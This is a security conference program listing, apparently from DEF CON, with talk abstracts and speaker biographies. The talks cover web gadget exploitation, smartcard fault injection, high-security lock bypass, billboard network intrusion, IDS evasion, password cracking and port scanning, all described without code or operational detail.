Justine Osborne is a Security Consultant with iSEC Partners. Justine specializes in web application penetration testing and her research interests include AJAX web applications, Flash, and emerging web technologies. Justine holds a BA in Computer Science from Mills College in Oakland, California.

Top of page

Xploiting Google Gadgets: Gmalware and Beyond


Tom "strace" Stracener
Senior Security Analyst
Robert "Rsnake" Hansen
CEO SecTheory

Google Gadgets are symptomatic of the Way 2.0 Way of things: from lame gadgets that rotate through pictures of puppies to calendars, and inline email on your iGoogle homepage. This talk will analyze the security history of Google Gadgets and demonstrate ways to exploit Gadgets for nefarious purposes. We will also show ways to create Gadgets that allow you to port scan internal systems and do various JavaScript hacks via malicious (or useful) gadgets, depending on your point of view. We've already ported various JavaScript attack utilities to Google Gadgets (like PDP's JavaScript port scanner) among other things. We will also disclose a zero day vulnerability in Google Gadgets that makes Gmalware (Gmodules based malware) a significant threat.

Tom "strace" Stracener is Cenzic's Sr. Security Analyst reporting to the office of the CTO. Mr. Stracener was one of the founding members of nCircle Network Security. While at nCircle he served as the head of vulnerability research from 1999 to 2001, developing one of the industry's first quantitative vulnerability scoring systems, and co-inventing several patented technologies. Mr. Stracener is an experienced security consultant, penetration tester, and vulnerability researcher. One of his patents, 'Interoperability of vulnerability and intrusion detection systems,' was granted by the USPTO in October 2005. Tom is the Senior Security Analyst for Cenzic's CIA Labs. Tom has spoken at various conferences including New York Security Conference, ISSA, OWASP, Defcon, and others.

Robert "RSnake" Hansen (CISSP) is the Chief Executive Officer of SecTheory. SecTheory is a web application and network security consulting firm. Robert has been working with web application security since the mid 90's, beginning his career in banner click fraud detection at ValueClick. Robert has worked for Cable & Wireless heading up managed security services, and at eBay as Sr. Global Product Manager of Trust and Safety, focusing on anti-phishing, anti-cross-site scripting, and anti-virus strategies. Robert also sits on the technical advisory board of ClickForensics and contributes to the security strategy of several startup companies. Robert is best known for founding the web application security lab at ha.ckers.org and co-authoring XSS Exploits and Defense. Robert is a member of WASC, IACSP, and ISSA, and contributed to the OWASP 2.0 guide.

Top of page

Inducing Momentary Faults Within Secure Smartcards / Microcontrollers


Christopher Tarnovsky
Flylogic Engineering, LLC

This presentation is intended for individuals with an understanding of the Intel 8051 and Motorola 6805 processor families from an Assembly language perspective. This will be an interactive presentation with the audience.

Log files will be examined that have been taken from the targets (smartcards) at every clock cycle of the CPU during its runtime. We will discuss our possibilities and determine points in time (clock cycle periods) to momentarily induce a fault within the target.

Our goal will be to override the normal behavior of the target for our own use such as:

• Temporary changes- Readout of normally private records from the device
• Permanent changes- Change non-volatile memory to create a back-door or completely rewrite behavior model

Both smartcards contain a Cryptographic co-processor and are known to have been used to secure Data, PCs, laptops and Sun-Ray terminals.

Flylogic Engineering, LLC specializes in analysis of semiconductors from a security ""how strong is it really"" standpoint. We offer detailed reports on substrate attacks which define if a problem exists. If a problem is identified, we explain in a detailed report all aspects of how the attack was done, level of complexity and so on. This is something we believe is unique and allows the customer to then go back to the chip vendor armed with the knowledge to make them make it better (or possibly use a different part).

Top of page

Open in 30 Seconds: Cracking One of the Most Secure Locks in America


Marc Weber Tobias
Investigative Attorney and Security Specialist – Security.org
Matt Fiddler
Security Specialist – Security.org

Many high security lock manufacturers claim that their cylinders are impervious to covert methods of entry including picking, bumping, and decoding and that they offer high levels of key control, effectively preventing the illegal or unauthorized duplication of their keys. New and unique methods to compromise one of the most secure locks in America by forced, covert, and surreptitious entry were developed during an eighteen month research project that has resulted in the filing of multiple patents and the ability to pick, bump, and mechanically bypass Medeco cylinders, sometimes in seconds. In this presentation we offer a detailed analysis of how the Medeco lock was compromised by a methodical analysis of its physical characteristics and their code database.

Medeco is the dominant leader in the North American high security lock sector. They protect venues that include the White House, Pentagon, and Royal Family residence in London. They are relied upon throughout the world for their security and invulnerability to attacks. As a result of disclosures by the presenters at DEFCON 15, they were forced to urgently upgrade their deadbolt locks. The new techniques of bypass that will be disclosed in this presentation will be equally significant, if not even more concerning because of their widespread security implications.

Marc Weber Tobias Marc Weber Tobias is an investigative attorney and security specialist living in Sioux Falls, South Dakota. As part of his practice, he represents and consults with lock manufacturers, government agencies and corporations in the U.S. and overseas regarding the design and bypass of locks and security systems. He has authored six police textbooks, including Locks, Safes, and Security, which is recognized as the primary reference for law enforcement and security professionals worldwide. The second edition, a 1400 page two-volume work, is utilized by criminal investigators, crime labs, locksmiths and those responsible for physical security. A fourteen-volume multimedia edition of his book is also available online. His website is security.org.

As a former prosecutor and Chief of the Organized Crime Unit for the Office of Attorney General, state of South Dakota, Marc supervised many major investigations and prosecutions. He continues to work investigations for government and private clients, mainly involving technical fraud issues.

Marc is a member of a number of professional security organizations, including the American Society of Industrial Security (ASIS), Association of Firearms and Tool Marks Examiners (AFTE), American Polygraph Association (APA) and American Association of Police Polygraphists (AAPP).

Marc has lectured extensively in the United States and Europe on physical security and certain aspects of criminal investigations and interrogation technique. He holds several patents involving the bypass of locks and security systems. Marc contributes a column to engadget.com and has been featured in many publications as well as radio and television stories around the world.

Marc will be releasing his new book, entitled OPEN IN THIRTY SECONDS: Cracking one of the most secure locks in America, at Defcon 16. This 350 page work details an eighteen month research project which culminated in the ability to bypass all layers of security of Medeco cylinders, perhaps the most respected high security lock in the United States.

Matt Fiddler As a security researcher Matt Fiddler's analysis of lock bypass techniques have resulted in many public and private disclosures of critical lock design flaws. Mr. Fiddler began his career as an Intelligence Analyst with the United States Marine Corps. Since joining the commercial sector in 1992, he has spent the last 16 years enhancing his extensive expertise in the area of Unix and Network Engineering, Security Consulting, Computer Forensics, and Intrusion Analysis.

Top of page

Hijacking the Outdoor Digital Billboard Network


Tottenkoph
Business Analyst, Raymond James Financial
Rev
Security Researcher
Philosopher
Security Researcher

Outdoor digital billboards are becoming the new way to advertise multiple products/services/etc with a single board as compared to having a street littered with dozens of these eyesores. Therefore, they're more fun to take apart and play with. While driving one day, I noticed a 404 error on one of these billboards and after discussing it with my fellow speakers, hatched a plan to hack into their network and advertise our own ideas/ "products". We will be talking about how we exploited the physical and network security of this well known company and used these to upload our own images. This is *not* a step-by-step how to, but rather addresses the vulnerabilities that exist and how they could be used for guerilla advertising and digital graffiti.

Tottenkoph- Business analyst, security consultant, crypto-fiend, hacker, and awesome chix0r. She started with hardware moding and pc repair stuff until the wonderful world of cryptography and open networks was stumbled upon. Tottenkoph is currently taking full advantage of the corporation's tuition and certification reimbursement programs while hopping from con to con insisting that it's "work related" and thus should be expensed (of course leaving out the amount of alcohol that can/will be consumed).

Rev- [insert elite bio here]

Philosopher- Student, budding old school phreak/hacker, polymath, and self-expressed amateur sociologist/social philosopher, as described by handle. Began with "power-use" (i.e., advanced comprehension and inquiry) of DOS and some Novell applications, as well as exploration into basic telephone electronics at the age of ten years. Currently a high school student enrolled in the International Baccalaureate program while voraciously seeking knowledge regarding several academic as well as technological fields. Specializes in and is absolutely fascinated with absolutely anything connected to the PTSN, with special emphasis on dial-up modem security, switching/PBX, voicemail,and landline telephone equipment/tests, as well as basic password security and human psychology as related to technology.

Top of page

How to make Friends & Influence Lock Manufacturers


Schuyler Towne
Executive Editor, Non-Destructive Entry Magazine
Jon King
Inventor, Medecoder

Locksport is growing up in America. In this talk we will explore four case studies demonstrating how the community has leveraged itself to bring about significant advances in the lock industry. We will demonstrate exploits discovered in both Medeco and ABUS high security locks and discuss how Kwikset's Smartkey system responded to the spread of information about bumping and how they plan to work with the community in the future. We will investigate the Robo-Key System, a new lock that has been developed in an open source atmosphere alongside the locksport community. Finally, a plea to the hacker community to help us continue the work we've started researching locking systems as more move into the electronic and digital realms and fostering positive relationships with the manufacturers.

Schuyler Towne is a competitive lockpicker, TOOOL member, and Executive Editor of NDE Magazine. He has spent the last year trying to resolve the ethics of responsible disclosure in physical security and bridge the gap between locksport and lock manufacturers.

Jon King is a locksport enthusiast currently serving in the US Navy. He has no experience as a locksmith nor does he hold any professional certifications of any kind. Instead, he enjoys what most locksmiths do not; the hacker spirit. He spends his free time analyzing and defeating high-security mechanical locks.

Top of page

Evade IDS/IPS Systems using Geospatial Threat Detection


Ryan Trost
Director of Security, Comprehensive Health Services

IDS/IPS systems are becoming more and more advanced and geocoding is adding another layer of intelligence to try and defend against a company's vulnerabilities. Learn how to evade complex geospatial threat detection countermeasures. Most crackers use zombie machines to launch professional attacks...but zombies even leave geographic fingerprints that are easily picked up by pattern recognition algorithms. Learn how to take professional attacks to the next level.

Ryan Trost is the Director of Security and the Data Privacy Officer at Comprehensive Health Services where he oversees all the organization's security and privacy decisions. He teaches several Information Technology courses including Ethical Hacking, Intrusion Detection and Data Visualization at Northern Virginia Community College which allows him to continue his technical interests. In his spare time he is working to cross-pollinate Network Security, Geographical Information Systems (GIS) and Data Visualization and is considered a leading expert in geospatial intrusion detection techniques. Ryan participated as a RedTeamer in the first annual Collegiate Cyber Defense Competition (CCDC) and fielded a team of students this past year. Ryan has been a Senior Security Consultant for several government agencies before transitioning over to the private sector. In 2005, Ryan received his MS degree in Computer Science from George Washington University where he developed his first geospatial intrusion detection tool.

Top of page

MetaPost-Exploitation


Valsmith
CTO, Offensive Computing, LLC
Colin Ames
Researcher, Offensive Computing, LLC

When penetration testing large environments, testers require the ability to maintain persistent access to systems they have exploited, leverage trusts to access other systems, and increase their foothold into the target. Post exploitation activities are some of the most labor intensive aspects of pen testing. These include password management, persistent host access, privileged escalation, trust relationships, acquiring GUI access, etc. Penetration testers acquire hashes, crack them, keep track of which passwords go with which usernames / systems and finally reuse this information to penetrate further systems.

Valsmith has been involved in the computer security community and industry for over ten years. He currently works as a professional security researcher on problems for both the government and private sectors. He specializes in penetration testing (over 40,000 machines assessed), reverse engineering and malware research. Valsmith is a member of the Cult of the Dead Cow NSF. He also works on the Metasploit Project development team as well as other vulnerability development efforts. Most recently Valsmith founded Offensive Computing, a public, open source malware research project.

Colin Ames is a security researcher with Offensive Computing LLC where he consults for both the private and public sectors. He's currently focused on Pen testing, Reverse Engineering, Malware Analysis and Steganographic research. He has spoken previously at RSA and other venues.

Top of page

Keeping Secret Secrets Secret and Sharing Secret Secrets Secretly


Vic Vandal
504 / NOLAB / NC2600

Have you ever wanted to:

If you answered "YES" to any of these questions then this talk is for you. Vic will walk you through the shadowy world of secret-splitting, steganography, spy tactics, and other methods to hide and/or exchange sensitive materials and information - without the use of traditional cryptography. Both digital and physical protection schemes will be covered during the course of the presentation. The audience will also get to play along in a handful of online challenges. So gird your loins, lock up your women and children, put on your dark sunglasses, and come join the fun.

For those interested in playing along during the stego portion of the talk, consider pre-installing any/all of the following tools:
- GifItUp (Windows)
- S-Tools (Windows)
- JPHS (Windows)
- MP3Stego (Windows or Linux)
- Camouflage (Windows)
- Stego (Mac)
- Hydan (Linux)

Vic Vandal is his name, digital havoc is his game! From skateboards to keyboards and everything in between, Vic can manipulate, conjugate, and detonate his tactical skills (that pay the bills) to burn your eyes with visual napalm!

Trained in cyber-warfare by the United States armed forces (actually it was more vice-versa, but such details are unimportant), Vic is now a digital mercenary ready to unleash his diabolical digital deeds for the right price.

His objective? Communications! A modern day ENIAC, Vic makes, creates, and propagates the everyday analog into digital mayhem for the masses. A Wizard of Oz in his own private cyber-wonderland, he is on his way to taking over all global transmissions. All your base are belong to him!

Top of page

Compliance: The Enterprise Vulnerability Roadmap


Weasel
Nomad Mobile Research Centre

Compliance is no longer new. Compliance has been accepted by the corporate-state. Compliance is common-place. Compliance is the intruders' new friend. Decision makers thinks Compliance == Security. While many compliance standards have resulted in the implementation of some very important controls, they have also left a roadmap for intruders, ill doers and the sort to hone their attack. This presentation will go over such weaknesses and show how compliance entities are, regardless of intent, proving that compliance != security.

Weasel is a veteran member Nomad Mobile Research Centre. Over the years he has performed deep research into areas ranging from Forensics/Anti-Forensics to Enterprise Culture to Cyber Warfare and Binary Analysis. Weasel is the last surviving international member of NMRC as Canada has been ruled too lame to be considered "international."

Top of page

Password Cracking on a Budget


Matt Weir
Security Researcher
Sudhir Aggarwal
Security Researcher

Not every bad guy writes down passwords on sticky note by their monitor. Not every system administrator fully documents everything before they leave. There are a lot of legitimate reasons why you might need to crack a password. The problem is most people don't have a supercomputer sitting in their basement or the money to go out and buy a rack of FPGAs. This talk deals with getting the most out of the computing resources you do have when cracking passwords.

Our group at Florida State University is currently working on password cracking research to aid in forensics analysis. We've analyzed disclosed password lists to try and figure out how real people actually create passwords. Not all of these lists have been in plain text so we've had to go through the pain of cracking passwords ourselves. Just like you, we are still waiting on funding for that supercomputer as well. In this talk, we'll go over some of the tools and techniques we've used to crack these password lists using only a couple of PCs, such as custom wordlist generation and choosing the right word mangling rules. We'll also talk about some of the lessons we've learned and the mistakes we've made along the way.

Matt Weir is a PhD student at Florida State University. Before his journey back into academia, he worked as a network security engineer for Northrop Grumman. The projects he's been a part of have ranged from providing first responders with wireless access, to assisting the Defense Department with computer forensics. Why he decided to go back to school no one knows (including him sometimes). It wasn't the pay that's for sure!

Sudhir Aggarwal has been Professor of Computer Science at Florida State University since the fall of 2002. He directs the E-Crime Investigative Technologies Laboratory. Previous to his current position, he was Chief Technology Officer of the Internet Content Delivery and Distribution business unit of Lucent Technologies, where he was responsible for the architecture, portfolio, and development of the Imminet product line. Dr. Aggarwal's current research interests are in building software tools and systems that support cybersecurity and digital forensics. He is also interested in computer and communication networks where he has investigated infrastructures for network games and techniques for building efficient overlay networks.

Top of page

RE:Trace: The Reverse Engineer's Unexpected Swiss Army Knife


David Weston
Security Engineer, SAIC
Tiller Beauchamp
Senior Security Engineer, SAIC

This presentation will detail the newest developments in RE:Trace, a reverse engineering framework based on Ruby and DTrace. We will discuss implementations for walking and searching the heap on OS X, tracing for kernel and driver vulnerabilities, pinpointing format string bugs and leveraging custom application probes, such as those built into browser and database software.

David Weston is security researcher and penetration tester at Science Applications International Corporation. Pursuing a graduate degree his research interests include: Fuzzing and Reverse Engineering. He has an undergraduate degree from the University of California at Santa Barbara.

Tiller Beauchamp works as a senior security consultant for SAIC providing security auditing services to large commercial, state and DoD customers. His areas of expertise include network penetration testing, web application security, IPv6 and exploit development. Beauchamp earned his M.S. in Computer Science from the University of Oregon with a specialization in software engineering. He has worked as the lead developer for Team Defend, SAIC's portable computer and network defense exercise. Beauchamp is also responsible for maintaining the company's penetration toolkit and penlab.

Top of page

Mobile Hacker Space


Thomas Wilhelm
Founder, De-ICE.net

There has been a recent global push for the creation of Hacker Spaces. Unfortunately, these ventures are risky and can be quite costly. In an effort to provide an alternative, or at least an intermediary step, this talk will discuss a different type of Hacker Space, one that is on wheels. During the course of this speech, we will discuss the advantages and disadvantages of building a mobile hacker space, and present a real-world example, which will be open to tours at DefCon (as long as it doesn't break down before it gets there). We will talk about the problems and solutions associated with the development of a mobile hacker space, and offer ideas for future designs. In addition, a list of current and future hacker projects will be discussed, and include IT-related and vehicle-related hacks.

Thomas Wilhelm: Currently employed in a Fortune 50 company performing penetration testing and risk assessments, Thomas has spent over 15 years in the Information System career field, and has received the following certifications: ISSMP, CISSP, SCSECA, SCNA, SCSA, IAM. Thomas is currently a PhD student, and is the founder of the De-ICE.net PenTest LiveCD project. Thomas has written for Hakin9 magazine, and has been published in multiple books, including: Penetration Tester's Open Source Toolkit, Volume 2; Metasploit Toolkit for Penetration Testing; and Netcat Toolkit, all available through Syngress Publishing.

Top of page

Web Privacy and Flash Local Shared Objects


Clinton Wong
Security Researcher

This talk discusses privacy issues concerning Adobe Flash Local Shared Objects. Adobe LSOs are similar to HTTP cookies, but not as easily controlled or configured using a standard web browser. Potential problems with Flash LSOs will be presented, as well as suggestions for increasing privacy while using Adobe LSOs.

Clinton Wong published HTTP Pocket Reference and Web Client Programming with Perl. He works in Silicon Valley.

Speaker Bio

Top of page

New ideas for old practices - Port-Scanning improved


Fabian "fabs" Yamaguchi
Recurity Labs GmbH, Berlin, Germany
FX
Head of Recurity Labs

How fast a port-scan can be is largely dependent on the performance of the network in question. Nonetheless, it is clear that choosing the most efficient scanning-speed is only possible based on sufficient information on the network's performance. We have thus designed and implemented a port-scanning method which provokes extra network-activity to increase the amount of information at our disposal in an attempt to gain speed on the long run.

Following this approach, we've managed to mimic TCPs properties to an extend which allows us to implement many congestion control schemes initially designed for TCP. Further tweaking the actual implementation by integrating it into the linux-kernel left us with a port-scanner ready to tackle big networks at an impressive speed.

Fabian "fabs" Yamaguchi currently studies computer-science and electrical engineering at the Berlin Institute of Technology where he focuses on data-communication and signal-processing. He has been working as a reverse-engineer and software-developer for Recurity Labs GmbH for about two years. During his school-time, he has worked on free-software projects such as the AfterStep-window-manager and he received the ArsDigita-Prize at MIT in 2001 for maintaining the "Young Programmer's Network", a community-project for young free-software-developers. Additionally, he has given presentations on port-scanning and bug-exploitation at the 24C3 and the 4th annual MNU congress in Berlin.

Felix "FX" Lindner runs Recurity Labs. FX has over 10 years experience in the computer industry, eight of them in consulting for large enterprise and telecommunication customers. He possesses a vast knowledge of computer sciences, telecommunications and software development. His background includes managing and participating in a variety of projects with a special emphasis on security planning, implementation, operation and testing using advanced methods in diverse technical environments. FX is well known in the computer security community and has presented his and Phenoelit's security research on Black Hat Briefings, CanSecWest, PacSec, DEFCON, Chaos Communication Congress, MEITSEC and numerous other events. His research topics included Cisco IOS, HP printers, SAP and RIM BlackBerry. Felix holds a title as State-Certified Technical Assistant for Informatics and Information Technology as well as Certified Information Systems Security Professional.

Top of page

The Death Envelope: A Medieval Solution to a 21st Century Problem


Matt Yoder
Security Researcher

While many aftercare solutions and recommendations cover "average American" needs, none have tackled, full-on, the needs of the rapidly growing high tech segment of the population. As the amount of passwords and other secret "brainspace-only" information grows for many, many, individuals, it becomes obvious that a solution is needed for the dispensation of this information in the event of one's death or extreme disablement. It turns out that this solution may be the humble paper envelope.

This talk begins to examine an approach to handle this problem, offering many suggestions, from the extremely reliable low-tech end, through hybrid and high tech solutions to the problem. It covers, as well, recommendations for what to include in one's envelope, and how to ensure its safety, security, and integrity. It also discusses why a wax stamp, sealed by a signet ring, no less, may still offer the best envelope tamper detection that exists.

Matt Yoder brings more than 15 years of general IT experience to this talk, including extensive time in systems administration of all flavors, including multiple forms of network devices. He has also spent time, in multiple stints, performing direct security consulting, including assessment and auditing, security systems support, and firewall deployment. When this experience is combined with a love of pen and paper, a detailed examination of the Death Envelope is the result. He currently spends his days, and earns something resembling an income, assisting with server administration for a major University in Colorado, which prefers to go unnamed.

Top of page

DAVIX Visualization Workshop

Need help understanding your gigabytes of application logs or network captures? Your OS performance metrics do not make sense? Then DAVIX, the live CD for visualizing IT data, is your answer!

To simplify the analysis of vast amounts of security data, visualization is slowly penetrating the security community. There are many free tools available for analysis and visualization of data. To simplify the use of these tools, the open source project DAVIX was put to life and is released this year at BlackHat/DEFCON.

At this "Bring Your Own Laptop" workshop we will introduce you to DAVIX. The workshop starts with an introduction to the set of available tools, the integrated manual, as well as customizing the CD to your needs. In a second part, you can use DAVIX to analyze a set of provided packet captures. In the end we will show some of the visualizations created by the participants. Be prepared for pretty and meaningful pictures!

For you to be able to participate in the analysis part of the workshop, you should bring an Intel or AMD x86 based notebook with at least 1GB of memory and a wireless LAN adapter. To avoid problems with the Wireless card setup we strongly recommend that you run DAVIX in VMware Player or VMware Fusion in NAT mode. The DAVIX ISO image should be downloaded before the workshop from the davix.secviz.org homepage. The network capture files will be made available during the workshop.

Jan P. Monsch is senior security analyst with the leading Swiss security assessment company Compass Security AG. He has almost 10 years experience in the field of IT security and most of it in the Swiss banking and insurance industry. His talent in understanding and assessing security in large environments has got him involved in several outsourcing projects with international participation. Apart from reviewing security he has trained many software developers, IT engineers and security officers in the fields of application and content security. His passion for application security and interest for better understanding security in real-world applications has lead him to the field of security visualization. The lack of broadly available solutions for data analysis and security visualization has motivated him to create DAVIX - The Data Analysis & Visualization Linux.

Raffael Marty: As chief security strategist and senior product manager, Raffy is customer advocate and guardian - expert on all things security and log analysis at Splunk. With customers, he uses his skills in data visualization, log management, intrusion detection, and compliance to solve problems and create solutions. Inside Splunk, he is the conduit for customer issues, new ideas and market requirements to the development team. Fully immersed in industry initiatives, standards efforts and activities, Raffy lives and breathes security and visualization. His passion for visualization is evident in the many presentations he gives at conferences around the world and the upcoming "Applied Security Visualization" book. In addition, Raffy is the author of AfterGlow, founder of the security visualization portal http://secviz.org, and contributing author to a number of books on security and visualization.

Top of page